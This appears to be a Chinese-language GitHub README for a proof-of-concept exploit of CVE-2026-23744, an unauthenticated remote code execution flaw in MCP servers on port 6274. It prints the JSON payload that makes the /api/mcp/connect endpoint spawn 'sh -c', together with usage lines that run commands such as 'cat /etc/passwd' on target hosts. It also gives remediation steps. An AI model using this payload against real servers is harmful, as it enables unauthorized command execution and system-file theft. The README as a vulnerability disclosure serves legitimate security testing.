d3vn0mi/CVE-2026-23744-POC
GitHub: d3vn0mi/CVE-2026-23744-POC
针对 CVE-2026-23744 的概念验证工具,用于验证 MCP 服务器未认证远程代码执行漏洞。
Stars: 0 | Forks: 0
# CVE-2026-23744 — MCP Server 未认证 RCE
## 概述
**CVE-2026-23744** 是暴露在端口 `6274` 上的 MCP 兼容服务器中的一个未认证远程代码执行 (RCE) 漏洞。`/api/mcp/connect` 端点接受一个 `serverConfig` 对象,该对象允许调用者指定任意的 OS 命令和参数——而无需任何身份验证或授权检查。
拥有该服务网络访问权限的攻击者可以以运行 MCP 服务器的用户身份执行任意命令。
| 详情 | 值 |
| ------------- | -------------------------------------- |
| **CVE ID** | CVE-2026-23744 |
| **类型** | 未认证远程代码执行 |
| **端点** | `POST /api/mcp/connect` |
| **端口** | 6274 (默认) |
| **严重程度** | 严重 |
## 漏洞 Payload
```
{
"serverConfig": {
"command": "sh",
"args": ["-c", ""],
"env": {}
},
"serverId": "anything"
}
```
服务器在未经任何过滤或访问控制的情况下,使用给定的 `args` 生成所提供的 `command`。
## 安装
```
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt
```
## 用法
```
# 基本用法
python3 exploit.py -t -c ''
# 自定义端口
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'
# 跳过可达性检查
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check
# 自定义 server ID
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server
```
### 选项
| 标志 | 描述 |
| ----------------- | -------------------------------------------- |
| `-t`, `--target` | 目标 IP 或主机名 *(必填)* |
| `-c`, `--command` | 要执行的 OS 命令 *(必填)* |
| `-p`, `--port` | 目标端口 (默认: `6274`) |
| `-s`, `--server-id` | Payload 中的 `serverId` 值 |
| `--timeout` | 探测超时时间(秒) (默认: `30`) |
| `--no-check` | 跳过初始可达性检查 |
## 修复建议
- **不要**将 MCP 服务器暴露给不可信网络。
- 尽快应用供应商补丁。
- 通过身份验证和网络级控制限制对 `/api/mcp/connect` 端点的访问。
- 监控 MCP 服务器进程产生的意外进程生成。
## 免责声明
本工具仅供**授权的安全测试和教育目的**使用。未经授权访问计算机系统是非法的。作者不对滥用行为承担任何责任。在测试前请务必获取适当的授权。
## 许可证
本项目基于 [MIT 许可证](LICENSE) 授权。
## 作者
**d3vn0mi** — [github.com/d3vn0mi](https://github.com/d3vn0mi)
标签:CISA项目, CVE-2026-23744, Maven, MCP Server, POC, Python, RCE, 事件响应, 命令注入, 无后门, 未授权访问, 漏洞验证, 端口6274, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞